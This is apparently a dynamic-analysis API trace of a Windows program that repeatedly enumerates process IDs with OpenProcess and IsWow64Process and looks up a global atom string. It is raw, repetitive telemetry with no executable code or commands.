	[0123.310] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.310] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.310] CloseHandle (hObject=0x69c) returned 1
	[0123.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.310] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.310] CloseHandle (hObject=0x69c) returned 1
	[0123.310] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.310] CloseHandle (hObject=0x69c) returned 1
	[0123.310] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.311] CloseHandle (hObject=0x69c) returned 1
	[0123.311] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.311] CloseHandle (hObject=0x69c) returned 1
	[0123.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0123.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0123.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0123.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0123.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0123.343] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0123.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0123.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0123.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0123.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0123.344] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0123.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0123.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0123.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0123.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0123.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0123.345] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0123.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0123.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0123.346] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.346] CloseHandle (hObject=0x69c) returned 1
	[0123.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0123.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0123.346] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0123.346] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.347] CloseHandle (hObject=0x69c) returned 1
	[0123.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0123.347] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0123.347] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.347] CloseHandle (hObject=0x69c) returned 1
	[0123.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0123.348] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.348] CloseHandle (hObject=0x69c) returned 1
	[0123.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0123.348] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.348] CloseHandle (hObject=0x69c) returned 1
	[0123.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0123.348] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.348] CloseHandle (hObject=0x69c) returned 1
	[0123.348] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0123.348] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.348] CloseHandle (hObject=0x69c) returned 1
	[0123.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0123.349] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.349] CloseHandle (hObject=0x69c) returned 1
	[0123.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0123.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0123.349] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.349] CloseHandle (hObject=0x69c) returned 1
	[0123.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0123.349] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.349] CloseHandle (hObject=0x69c) returned 1
	[0123.349] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0123.349] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.350] CloseHandle (hObject=0x69c) returned 1
	[0123.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0123.350] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.350] CloseHandle (hObject=0x69c) returned 1
	[0123.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0123.350] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.350] CloseHandle (hObject=0x69c) returned 1
	[0123.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0123.350] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.350] CloseHandle (hObject=0x69c) returned 1
	[0123.350] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0123.350] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.350] CloseHandle (hObject=0x69c) returned 1
	[0123.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0123.351] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.351] CloseHandle (hObject=0x69c) returned 1
	[0123.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0123.351] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.351] CloseHandle (hObject=0x69c) returned 1
	[0123.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0123.351] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.351] CloseHandle (hObject=0x69c) returned 1
	[0123.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0123.351] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.351] CloseHandle (hObject=0x69c) returned 1
	[0123.351] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0123.352] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.352] CloseHandle (hObject=0x69c) returned 1
	[0123.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0123.352] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.352] CloseHandle (hObject=0x69c) returned 1
	[0123.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0123.352] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.352] CloseHandle (hObject=0x69c) returned 1
	[0123.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0123.352] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.352] CloseHandle (hObject=0x69c) returned 1
	[0123.352] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0123.352] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.352] CloseHandle (hObject=0x69c) returned 1
	[0123.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0123.353] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.353] CloseHandle (hObject=0x69c) returned 1
	[0123.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0123.353] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.353] CloseHandle (hObject=0x69c) returned 1
	[0123.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0123.353] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.353] CloseHandle (hObject=0x69c) returned 1
	[0123.353] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0123.354] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.354] CloseHandle (hObject=0x69c) returned 1
	[0123.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0123.354] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.354] CloseHandle (hObject=0x69c) returned 1
	[0123.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.354] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.354] CloseHandle (hObject=0x69c) returned 1
	[0123.354] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.355] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.355] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.355] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.355] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.355] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.356] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.356] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0123.356] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.356] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.356] CloseHandle (hObject=0x69c) returned 1
	[0123.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0123.356] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.356] CloseHandle (hObject=0x69c) returned 1
	[0123.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0123.356] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.356] CloseHandle (hObject=0x69c) returned 1
	[0123.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0123.357] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.357] CloseHandle (hObject=0x69c) returned 1
	[0123.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0123.357] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.357] CloseHandle (hObject=0x69c) returned 1
	[0123.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0123.358] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.358] CloseHandle (hObject=0x69c) returned 1
	[0123.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0123.440] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0123.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0123.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0123.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0123.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0123.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0123.441] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0123.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0123.442] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0123.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0123.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0123.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0123.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0123.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0123.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0123.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0123.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0123.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0123.444] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.444] CloseHandle (hObject=0x69c) returned 1
	[0123.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0123.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0123.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0123.447] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.447] CloseHandle (hObject=0x69c) returned 1
	[0123.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0123.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0123.447] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.447] CloseHandle (hObject=0x69c) returned 1
	[0123.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0123.448] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.448] CloseHandle (hObject=0x69c) returned 1
	[0123.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0123.448] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.448] CloseHandle (hObject=0x69c) returned 1
	[0123.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0123.448] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.448] CloseHandle (hObject=0x69c) returned 1
	[0123.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0123.448] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.448] CloseHandle (hObject=0x69c) returned 1
	[0123.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0123.449] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.449] CloseHandle (hObject=0x69c) returned 1
	[0123.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0123.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0123.449] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.449] CloseHandle (hObject=0x69c) returned 1
	[0123.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0123.449] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.449] CloseHandle (hObject=0x69c) returned 1
	[0123.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0123.449] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.449] CloseHandle (hObject=0x69c) returned 1
	[0123.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0123.450] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.450] CloseHandle (hObject=0x69c) returned 1
	[0123.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0123.450] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.450] CloseHandle (hObject=0x69c) returned 1
	[0123.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0123.450] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.450] CloseHandle (hObject=0x69c) returned 1
	[0123.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0123.450] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.450] CloseHandle (hObject=0x69c) returned 1
	[0123.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0123.451] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.451] CloseHandle (hObject=0x69c) returned 1
	[0123.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0123.451] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.451] CloseHandle (hObject=0x69c) returned 1
	[0123.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0123.451] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.451] CloseHandle (hObject=0x69c) returned 1
	[0123.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0123.452] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.452] CloseHandle (hObject=0x69c) returned 1
	[0123.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0123.452] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.452] CloseHandle (hObject=0x69c) returned 1
	[0123.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0123.452] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.453] CloseHandle (hObject=0x69c) returned 1
	[0123.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0123.453] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.453] CloseHandle (hObject=0x69c) returned 1
	[0123.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0123.453] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.453] CloseHandle (hObject=0x69c) returned 1
	[0123.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0123.453] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.453] CloseHandle (hObject=0x69c) returned 1
	[0123.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0123.454] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.454] CloseHandle (hObject=0x69c) returned 1
	[0123.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0123.454] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.454] CloseHandle (hObject=0x69c) returned 1
	[0123.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0123.454] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.454] CloseHandle (hObject=0x69c) returned 1
	[0123.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0123.454] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.454] CloseHandle (hObject=0x69c) returned 1
	[0123.454] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0123.454] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.455] CloseHandle (hObject=0x69c) returned 1
	[0123.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.455] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.455] CloseHandle (hObject=0x69c) returned 1
	[0123.455] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0123.455] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.456] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0123.456] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0123.456] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.456] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0123.457] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0123.457] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0123.457] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0123.457] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0123.457] CloseHandle (hObject=0x69c) returned 1
	[0123.457] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0123.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x69c
	[0123.458] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.458] CloseHandle (hObject=0x69c) returned 1
	[0123.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x69c
	[0123.458] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.458] CloseHandle (hObject=0x69c) returned 1
	[0123.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x69c
	[0123.458] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.458] CloseHandle (hObject=0x69c) returned 1
	[0123.458] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb0) returned 0x69c
	[0123.458] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.458] CloseHandle (hObject=0x69c) returned 1
	[0123.459] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2e4) returned 0x69c
	[0123.459] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0123.459] CloseHandle (hObject=0x69c) returned 1
	[0123.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0123.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0123.547] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
